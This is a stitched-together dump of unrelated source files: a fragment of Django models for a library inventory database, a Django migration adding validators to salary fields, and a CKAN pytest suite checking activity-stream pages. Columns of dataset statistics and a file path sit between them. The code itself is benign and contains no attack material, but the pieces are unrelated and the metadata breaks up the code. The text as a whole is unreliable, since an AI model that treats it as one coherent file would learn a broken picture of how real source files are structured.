    total_items_transito = models.IntegerField()
    total_items_problemas_de_catalogacion = models.IntegerField()
    total_items_faltantes = models.IntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'libros'
class Cd(models.Model):
    """Per-status item-count snapshot; maps to the legacy `cd` table.

    Counter layout identical to Resp/Issue/Libros.
    """
    idinventario_cd = models.PositiveIntegerField(primary_key=True)
    total_items = models.IntegerField()
    total_items_inventariados = models.IntegerField()
    total_items_en_prestamos_permanente = models.IntegerField()
    total_items_en_morosos_alumnos = models.IntegerField()
    total_items_morosos_academicos = models.IntegerField()
    total_items_morosos_funcionarios = models.IntegerField()
    total_items_morosos_postgrado = models.IntegerField()
    total_items_morosos_pib = models.IntegerField()
    total_items_extraviados = models.IntegerField()
    total_items_perdidos = models.IntegerField()
    total_items_inutilizados = models.IntegerField()
    total_items_deteriorados_para_empastar = models.IntegerField()
    total_items_transito = models.IntegerField()
    total_items_problemas_de_catalogacion = models.IntegerField()
    total_items_faltantes = models.IntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'cd'
class Inventario(models.Model):
    """Inventory run linking the four count snapshots; `inventario` table."""
    idinventario = models.AutoField(primary_key=True)
    # One snapshot row per material type.
    idinventario_libros = models.ForeignKey('Libros', models.DO_NOTHING, db_column='idinventario_libros')
    idinventario_issue = models.ForeignKey('Issue', models.DO_NOTHING, db_column='idinventario_issue')
    idinventario_cd = models.ForeignKey(Cd, models.DO_NOTHING, db_column='idinventario_cd')
    idinventario_resp = models.ForeignKey('Resp', models.DO_NOTHING, db_column='idinventario_resp')
    nombre_inventario = models.CharField(max_length=50)
    # Lifecycle timestamps: start, end, and report date of the run.
    f_inicio = models.DateTimeField()
    f_termino = models.DateTimeField()
    f_informe = models.DateTimeField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'inventario'
class Registra(models.Model):
    """Audit row: which user registered which inventory, and when."""
    idregistro = models.AutoField(primary_key=True)
    idusuario = models.ForeignKey('Usuario', models.DO_NOTHING, db_column='idusuario')
    idinventario = models.ForeignKey(Inventario, models.DO_NOTHING, db_column='idinventario')
    fecha_registro = models.DateTimeField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'registra'
class HistorialCd(models.Model):
    """Historical versions of a Cd count snapshot; `historial_cd` table."""
    id_historial_c = models.AutoField(primary_key=True)
    idinventario_cd = models.ForeignKey(Cd, models.DO_NOTHING, db_column='idinventario_cd')
    # Same per-status counters as Cd, but unsigned (PositiveIntegerField).
    total_items = models.PositiveIntegerField()
    total_items_inventariados = models.PositiveIntegerField()
    total_items_en_prestamos_permanente = models.PositiveIntegerField()
    total_items_en_morosos_alumnos = models.PositiveIntegerField()
    total_items_morosos_academicos = models.PositiveIntegerField()
    total_items_morosos_funcionarios = models.PositiveIntegerField()
    total_items_morosos_postgrado = models.PositiveIntegerField()
    total_items_morosos_pib = models.PositiveIntegerField()
    total_items_extraviados = models.PositiveIntegerField()
    total_items_perdidos = models.PositiveIntegerField()
    total_items_inutilizados = models.PositiveIntegerField()
    total_items_deteriorados_para_empastar = models.PositiveIntegerField()
    total_items_transito = models.PositiveIntegerField()
    total_items_problemas_de_catalogacion = models.PositiveIntegerField()
    total_items_faltantes = models.PositiveIntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'historial_cd'
class HistorialIssue(models.Model):
    """Historical versions of an Issue count snapshot; `historial_issue` table."""
    id_historial_i = models.AutoField(primary_key=True)
    idinventario_issue = models.ForeignKey('Issue', models.DO_NOTHING, db_column='idinventario_issue')
    total_items = models.IntegerField()
    total_items_inventariados = models.IntegerField()
    total_items_en_prestamos_permanente = models.IntegerField()
    total_items_en_morosos_alumnos = models.IntegerField()
    total_items_morosos_academicos = models.IntegerField()
    total_items_morosos_funcionarios = models.IntegerField()
    total_items_morosos_postgrado = models.IntegerField()
    total_items_morosos_pib = models.IntegerField()
    total_items_extraviados = models.IntegerField()
    total_items_perdidos = models.IntegerField()
    total_items_inutilizados = models.IntegerField()
    total_items_deteriorados_para_empastar = models.IntegerField()
    total_items_transito = models.IntegerField()
    total_items_problemas_de_catalogacion = models.IntegerField()
    total_items_faltantes = models.IntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'historial_issue'
class HistorialLibros(models.Model):
    """Historical versions of a Libros count snapshot; `historial_libros` table."""
    id_historial_l = models.AutoField(db_column='id_historial_L', primary_key=True)  # Field name made lowercase.
    idinventario_libros = models.ForeignKey('Libros', models.DO_NOTHING, db_column='idinventario_libros')
    total_items = models.IntegerField()
    total_items_inventariados = models.IntegerField()
    total_items_en_prestamos_permanente = models.IntegerField()
    total_items_en_morosos_alumnos = models.IntegerField()
    total_items_morosos_academicos = models.IntegerField()
    total_items_morosos_funcionarios = models.IntegerField()
    total_items_morosos_postgrado = models.IntegerField()
    total_items_morosos_pib = models.IntegerField()
    total_items_extraviados = models.IntegerField()
    total_items_perdidos = models.IntegerField()
    total_items_inutilizados = models.IntegerField()
    total_items_deteriorados_para_empastar = models.IntegerField()
    total_items_transito = models.IntegerField()
    total_items_problemas_de_catalogacion = models.IntegerField()
    total_items_faltantes = models.IntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'historial_libros'
class HistorialResp(models.Model):
    """Historical versions of a Resp count snapshot; `historial_resp` table."""
    id_historial_r = models.AutoField(primary_key=True)
    idinventario_resp = models.ForeignKey('Resp', models.DO_NOTHING, db_column='idinventario_resp')
    # Same per-status counters as Resp, but unsigned (PositiveIntegerField).
    total_items = models.PositiveIntegerField()
    total_items_inventariados = models.PositiveIntegerField()
    total_items_en_prestamos_permanente = models.PositiveIntegerField()
    total_items_en_morosos_alumnos = models.PositiveIntegerField()
    total_items_morosos_academicos = models.PositiveIntegerField()
    total_items_morosos_funcionarios = models.PositiveIntegerField()
    total_items_morosos_postgrado = models.PositiveIntegerField()
    total_items_morosos_pib = models.PositiveIntegerField()
    total_items_extraviados = models.PositiveIntegerField()
    total_items_perdidos = models.PositiveIntegerField()
    total_items_inutilizados = models.PositiveIntegerField()
    total_items_deteriorados_para_empastar = models.PositiveIntegerField()
    total_items_transito = models.PositiveIntegerField()
    total_items_problemas_de_catalogacion = models.PositiveIntegerField()
    total_items_faltantes = models.PositiveIntegerField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'historial_resp'
class Edita(models.Model):
    """Audit row: user who edited a CD history entry, and when; `edita` table."""
    id = models.AutoField(primary_key=True)
    # NOTE(review): OneToOneField with CASCADE differs from the DO_NOTHING
    # ForeignKey pattern used elsewhere in this module — confirm intended.
    idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
    id_historial_c = models.ForeignKey(HistorialCd, models.DO_NOTHING, db_column='id_historial_c')
    fecha_registro = models.DateTimeField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'edita'
class Modifica(models.Model):
    """Audit row: user who modified an Issue history entry; `modifica` table."""
    id = models.AutoField(primary_key=True)
    # NOTE(review): OneToOneField with CASCADE differs from the DO_NOTHING
    # ForeignKey pattern used elsewhere in this module — confirm intended.
    idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
    id_historial_i = models.ForeignKey(HistorialIssue, models.DO_NOTHING, db_column='id_historial_i')
    fecha_registro = models.DateTimeField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'modifica'
class Cambia(models.Model):
    """Audit row: user who changed a Libros history entry; `cambia` table."""
    id = models.AutoField(primary_key=True)
    # NOTE(review): OneToOneField with CASCADE differs from the DO_NOTHING
    # ForeignKey pattern used elsewhere in this module — confirm intended.
    idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
    id_historial_l = models.ForeignKey(HistorialLibros, models.DO_NOTHING, db_column='id_historial_l')
    fecha_registro = models.DateTimeField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'cambia'
class Actualiza(models.Model):
    """Audit row: user who updated a Resp history entry; `actualiza` table."""
    id = models.AutoField(primary_key=True)
    # NOTE(review): OneToOneField with CASCADE differs from the DO_NOTHING
    # ForeignKey pattern used elsewhere in this module — confirm intended.
    idusuario = models.OneToOneField(Usuario,on_delete=models.CASCADE)
    id_historial_r = models.ForeignKey('HistorialResp', models.DO_NOTHING, db_column='id_historial_r')
    fecha_registro = models.DateTimeField()

    class Meta:
        # Legacy table; not managed by Django migrations.
        managed = False
        db_table = 'actualiza'
| 41.878689
| 113
| 0.767635
| 1,402
| 12,773
| 6.651926
| 0.108417
| 0.128673
| 0.207163
| 0.252198
| 0.845057
| 0.818036
| 0.799164
| 0.779863
| 0.7641
| 0.7641
| 0
| 0.002399
| 0.151413
| 12,773
| 304
| 114
| 42.016447
| 0.858013
| 0.037579
| 0
| 0.72541
| 1
| 0
| 0.034028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008197
| false
| 0.004098
| 0.004098
| 0.008197
| 0.868852
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
1b894170f01ed69b285ff953828dc42cbccc4bf8
| 1,540
|
py
|
Python
|
salary/migrations/0016_auto_20200925_2035.py
|
akashbindal91/django_payroll_system
|
b895494065244297bbd41ac8c5bb92bd3208eb24
|
[
"MIT"
] | null | null | null |
salary/migrations/0016_auto_20200925_2035.py
|
akashbindal91/django_payroll_system
|
b895494065244297bbd41ac8c5bb92bd3208eb24
|
[
"MIT"
] | null | null | null |
salary/migrations/0016_auto_20200925_2035.py
|
akashbindal91/django_payroll_system
|
b895494065244297bbd41ac8c5bb92bd3208eb24
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2020-09-25 20:35
from django.db import migrations, models
import salary.models
class Migration(migrations.Migration):
    """Attach the `validate_fields` validator to the six Salary amount
    columns, each a DecimalField(decimal_places=2, max_digits=15)."""

    dependencies = [
        ('salary', '0015_remove_salary_id'),
    ]

    # All six columns receive the identical field definition, so build the
    # AlterField operations from one template instead of repeating them.
    operations = [
        migrations.AlterField(
            model_name='salary',
            name=column,
            field=models.DecimalField(decimal_places=2, max_digits=15, validators=[salary.models.validate_fields]),
        )
        for column in ('basic', 'da', 'ea', 'hra', 'pa', 'total')
    ]
| 34.222222
| 115
| 0.615584
| 157
| 1,540
| 5.866242
| 0.267516
| 0.091205
| 0.162866
| 0.188925
| 0.801303
| 0.801303
| 0.758958
| 0.758958
| 0.758958
| 0.758958
| 0
| 0.031858
| 0.266234
| 1,540
| 44
| 116
| 35
| 0.783186
| 0.027922
| 0
| 0.631579
| 1
| 0
| 0.05485
| 0.014047
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9410f34560e399046b37accbd06a647c58cf48ff
| 38,254
|
py
|
Python
|
ckanext/activity/tests/test_views.py
|
salsadigitalauorg/ckan
|
7586d78682c30f205027522214f33ee2bf413055
|
[
"BSD-3-Clause"
] | null | null | null |
ckanext/activity/tests/test_views.py
|
salsadigitalauorg/ckan
|
7586d78682c30f205027522214f33ee2bf413055
|
[
"BSD-3-Clause"
] | null | null | null |
ckanext/activity/tests/test_views.py
|
salsadigitalauorg/ckan
|
7586d78682c30f205027522214f33ee2bf413055
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest.mock as mock
from datetime import datetime
import pytest
from bs4 import BeautifulSoup
import ckan.model as model
import ckan.lib.dictization as dictization
from ckan.lib.helpers import url_for
from ckan.tests import factories, helpers
from ckanext.activity.model import Activity, activity as activity_model
from ckanext.activity.logic.validators import object_id_validators
def _clear_activities():
    """Delete every Activity row and flush the pending session state."""
    session = model.Session
    session.query(Activity).delete()
    session.flush()
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("non_clean_db", "with_plugins")
class TestOrganization(object):
    """View tests for the organization activity-stream page."""

    def test_simple(self, app):
        """Checking the template shows the activity stream."""
        user = factories.User()
        org = factories.Organization(user=user)
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        assert user["fullname"] in response
        assert "created the organization" in response

    def test_create_organization(self, app):
        """Creating an org renders a 'created the organization' activity."""
        user = factories.User()
        org = factories.Organization(user=user)
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "created the organization" in response
        assert (
            '<a href="/organization/{}">{}'.format(org["name"], org["title"])
            in response
        )

    def test_change_organization(self, app):
        """Updating an org's title shows an 'updated the organization' activity."""
        user = factories.User()
        org = factories.Organization(user=user)
        _clear_activities()
        org["title"] = "Organization with changed title"
        helpers.call_action(
            "organization_update", context={"user": user["name"]}, **org
        )
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the organization" in response
        assert (
            '<a href="/organization/{}">Organization with changed title'
            .format(org["name"])
            in response
        )

    def test_delete_org_using_organization_delete(self, app):
        """organization_delete makes the org's activity page return 404."""
        user = factories.User()
        org = factories.Organization(user=user)
        _clear_activities()
        helpers.call_action(
            "organization_delete", context={"user": user["name"]}, **org
        )
        url = url_for("activity.organization_activity", id=org["id"])
        env = {"REMOTE_USER": user["name"]}
        app.get(url, extra_environ=env, status=404)
        # organization_delete causes the Member to state=deleted and then the
        # user doesn't have permission to see their own deleted Organization.
        # Therefore you can't render the activity stream of that org. You'd
        # hope that organization_delete was the same as organization_update
        # state=deleted but they are not...

    def test_delete_org_by_updating_state(self, app):
        """Deleting via state='deleted' still renders the activity stream."""
        user = factories.User()
        org = factories.Organization(user=user)
        _clear_activities()
        org["state"] = "deleted"
        helpers.call_action(
            "organization_update", context={"user": user["name"]}, **org
        )
        url = url_for("activity.organization_activity", id=org["id"])
        env = {"REMOTE_USER": user["name"]}
        response = app.get(url, extra_environ=env)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "deleted the organization" in response
        assert (
            '<a href="/organization/{}">{}'.format(org["name"], org["title"])
            in response
        )

    def test_create_dataset(self, app):
        """Creating a dataset in the org shows a 'created the dataset' activity."""
        user = factories.User()
        org = factories.Organization()
        _clear_activities()
        dataset = factories.Dataset(owner_org=org["id"], user=user)
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "created the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_change_dataset(self, app):
        """Updating an org's dataset shows an 'updated the dataset' activity."""
        user = factories.User()
        org = factories.Organization()
        dataset = factories.Dataset(owner_org=org["id"], user=user)
        _clear_activities()
        dataset["title"] = "Dataset with changed title"
        helpers.call_action(
            "package_update", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_delete_dataset(self, app):
        """Deleting an org's dataset shows a 'deleted the dataset' activity."""
        user = factories.User()
        org = factories.Organization()
        dataset = factories.Dataset(owner_org=org["id"], user=user)
        _clear_activities()
        helpers.call_action(
            "package_delete", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "deleted the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("non_clean_db", "with_plugins")
class TestUser:
def test_simple(self, app):
"""Checking the template shows the activity stream."""
user = factories.User()
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
assert user["fullname"] in response
assert "signed up" in response
def test_create_user(self, app):
user = factories.User()
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "signed up" in response
def test_change_user(self, app):
user = factories.User()
_clear_activities()
user["fullname"] = "Mr. Changed Name"
helpers.call_action(
"user_update", context={"user": user["name"]}, **user
)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated their profile" in response
def test_create_dataset(self, app):
user = factories.User()
_clear_activities()
dataset = factories.Dataset(user=user)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_change_dataset(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
dataset["title"] = "Dataset with changed title"
helpers.call_action(
"package_update", context={"user": user["name"]}, **dataset
)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "updated the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_delete_dataset(self, app):
user = factories.User()
dataset = factories.Dataset(user=user)
_clear_activities()
helpers.call_action(
"package_delete", context={"user": user["name"]}, **dataset
)
url = url_for("activity.user_activity", id=user["id"])
env = {"REMOTE_USER": user["name"]}
response = app.get(url, extra_environ=env)
page = BeautifulSoup(response.body)
href = page.select_one(".dataset")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "deleted the dataset" in response
assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert dataset["title"] in href.text.strip()
def test_create_group(self, app):
user = factories.User()
group = factories.Group(user=user)
url = url_for("activity.user_activity", id=user["id"])
response = app.get(url)
page = BeautifulSoup(response.body)
href = page.select_one(".group")
assert (
'<a href="/user/{}">{}'.format(user["name"], user["fullname"])
in response
)
assert "created the group" in response
assert group["id"] in href.select_one("a")["href"].split("/", 2)[-1]
assert group["title"] in href.text.strip()
def test_change_group(self, app):
    """Updating a group appears on the user's activity stream as an
    'updated the group' entry with the new title."""
    user = factories.User()
    group = factories.Group(user=user)
    _clear_activities()
    group["title"] = "Group with changed title"
    helpers.call_action(
        "group_update", context={"user": user["name"]}, **group
    )
    url = url_for("activity.user_activity", id=user["id"])
    response = app.get(url)
    page = BeautifulSoup(response.body)
    href = page.select_one(".group")
    assert (
        '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
        in response
    )
    assert "updated the group" in response
    assert group["id"] in href.select_one("a")["href"].split("/", 2)[-1]
    assert group["title"] in href.text.strip()
def test_delete_group_using_group_delete(self, app):
    """Deleting a group via group_delete appears on the user's activity
    stream as a 'deleted the group' entry."""
    user = factories.User()
    group = factories.Group(user=user)
    _clear_activities()
    helpers.call_action(
        "group_delete", context={"user": user["name"]}, **group
    )
    url = url_for("activity.user_activity", id=user["id"])
    response = app.get(url)
    page = BeautifulSoup(response.body)
    href = page.select_one(".group")
    assert (
        '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
        in response
    )
    assert "deleted the group" in response
    assert group["id"] in href.select_one("a")["href"].split("/", 2)[-1]
    assert group["title"] in href.text.strip()
def test_delete_group_by_updating_state(self, app):
    """Soft-deleting a group (group_update with state='deleted') shows a
    'deleted the group' entry on the group's own activity page."""
    user = factories.User()
    group = factories.Group(user=user)
    _clear_activities()
    group["state"] = "deleted"
    helpers.call_action(
        "group_update", context={"user": user["name"]}, **group
    )
    # Note: asserts against the *group* activity page, not the user's.
    url = url_for("activity.group_activity", id=group["id"])
    # Authenticate as the owner so the deleted group is still visible.
    env = {"REMOTE_USER": user["name"]}
    response = app.get(url, extra_environ=env)
    assert (
        '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
        in response
    )
    assert "deleted the group" in response
    assert (
        '<a href="/group/{}">{}'.format(group["name"], group["title"])
        in response
    )
@pytest.mark.ckan_config("ckan.plugins", "activity")
@pytest.mark.usefixtures("clean_db", "with_plugins")
class TestPackage:
    """Rendering tests for the dataset (package) activity-stream pages:
    entries for create/update/delete, old-version and change views,
    custom activity types, and timestamp-based pagination."""

    def test_simple(self, app):
        """Checking the template shows the activity stream."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        assert user["fullname"] in response
        assert "created the dataset" in response

    def test_create_dataset(self, app):
        """Dataset creation renders actor link, verb, and dataset link."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "created the dataset" in response
        # The dataset link's URL path ends with the dataset id.
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_change_dataset(self, app):
        """A title change renders an 'updated the dataset' entry."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        _clear_activities()
        dataset["title"] = "Dataset with changed title"
        helpers.call_action(
            "package_update", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_create_tag_directly(self, app):
        """Adding a tag via package_update yields exactly one activity."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        _clear_activities()
        dataset["tags"] = [{"name": "some_tag"}]
        helpers.call_action(
            "package_update", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        assert len(activities) == 1

    # NOTE(review): this body is identical to test_create_tag_directly —
    # possibly one of the two was meant to use tag_create; verify upstream.
    def test_create_tag(self, app):
        """Adding a tag yields a single 'updated the dataset' activity."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        _clear_activities()
        dataset["tags"] = [{"name": "some_tag"}]
        helpers.call_action(
            "package_update", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        assert len(activities) == 1

    def test_create_extra(self, app):
        """Adding an extra yields a single 'updated the dataset' activity."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        _clear_activities()
        dataset["extras"] = [{"key": "some", "value": "extra"}]
        helpers.call_action(
            "package_update", context={"user": user["name"]}, **dataset
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        assert len(activities) == 1

    def test_create_resource(self, app):
        """resource_create is reported as an update of the parent dataset."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        _clear_activities()
        helpers.call_action(
            "resource_create",
            context={"user": user["name"]},
            name="Test resource",
            package_id=dataset["id"],
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        assert len(activities) == 1

    def test_update_resource(self, app):
        """resource_update is reported as an update of the parent dataset."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        resource = factories.Resource(package_id=dataset["id"])
        _clear_activities()
        helpers.call_action(
            "resource_update",
            context={"user": user["name"]},
            id=resource["id"],
            name="Test resource updated",
            package_id=dataset["id"],
        )
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "updated the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()
        activities = helpers.call_action(
            "package_activity_list", id=dataset["id"]
        )
        assert len(activities) == 1

    def test_delete_dataset(self, app):
        """Dataset deletion shows on the owning organization's stream."""
        user = factories.User()
        org = factories.Organization()
        dataset = factories.Dataset(owner_org=org["id"], user=user)
        _clear_activities()
        helpers.call_action(
            "package_delete", context={"user": user["name"]}, **dataset
        )
        # Asserted via the organization activity page, not the package page.
        url = url_for("activity.organization_activity", id=org["id"])
        response = app.get(url)
        page = BeautifulSoup(response.body)
        href = page.select_one(".dataset")
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        assert "deleted the dataset" in response
        assert dataset["id"] in href.select_one("a")["href"].split("/", 2)[-1]
        assert dataset["title"] in href.text.strip()

    def test_admin_can_see_old_versions(self, app):
        """A logged-in user sees the 'View this version' links."""
        user = factories.User()
        env = {"REMOTE_USER": user["name"]}
        dataset = factories.Dataset(user=user)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url, extra_environ=env)
        assert "View this version" in response

    def test_public_cant_see_old_versions(self, app):
        """Anonymous visitors get no 'View this version' links."""
        user = factories.User()
        dataset = factories.Dataset(user=user)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        assert "View this version" not in response

    def test_admin_can_see_changes(self, app):
        """A logged-in user sees the 'Changes' diff links."""
        user = factories.User()
        env = {"REMOTE_USER": user["name"]}
        dataset = factories.Dataset()  # activities by system user aren't shown
        dataset["title"] = "Changed"
        helpers.call_action("package_update", **dataset)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url, extra_environ=env)
        assert "Changes" in response

    def test_public_cant_see_changes(self, app):
        """Anonymous visitors get no 'Changes' diff links."""
        dataset = factories.Dataset()  # activities by system user aren't shown
        dataset["title"] = "Changed"
        helpers.call_action("package_update", **dataset)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        assert "Changes" not in response

    # ckanext-canada uses their IActivity to add their custom activity to the
    # list of validators: https://github.com/open-data/ckanext-canada/blob/6870e5bc38a04aa8cef191b5e9eb361f9560872b/ckanext/canada/plugins.py#L596
    # but it's easier here to just hack patch it in
    @mock.patch(
        "ckanext.activity.logic.validators.object_id_validators",
        dict(
            list(object_id_validators.items())
            + [("changed datastore", "package_id_exists")]
        ),
    )
    def test_custom_activity(self, app):
        """Render a custom activity"""
        user = factories.User()
        organization = factories.Organization(
            users=[{"name": user["id"], "capacity": "admin"}]
        )
        dataset = factories.Dataset(owner_org=organization["id"], user=user)
        resource = factories.Resource(package_id=dataset["id"])
        _clear_activities()
        # Create a custom Activity object. This one is inspired by:
        # https://github.com/open-data/ckanext-canada/blob/master/ckanext/canada/activity.py
        activity_dict = {
            "user_id": user["id"],
            "object_id": dataset["id"],
            "activity_type": "changed datastore",
            "data": {
                "resource_id": resource["id"],
                "pkg_type": dataset["type"],
                "resource_name": "june-2018",
                "owner_org": organization["name"],
                "count": 5,
            },
        }
        helpers.call_action("activity_create", **activity_dict)
        url = url_for("activity.package_activity", id=dataset["id"])
        response = app.get(url)
        assert (
            '<a href="/user/{}">{}'.format(user["name"], user["fullname"])
            in response
        )
        # it renders the activity with fallback.html, since we've not defined
        # changed_datastore.html in this case
        assert "changed datastore" in response

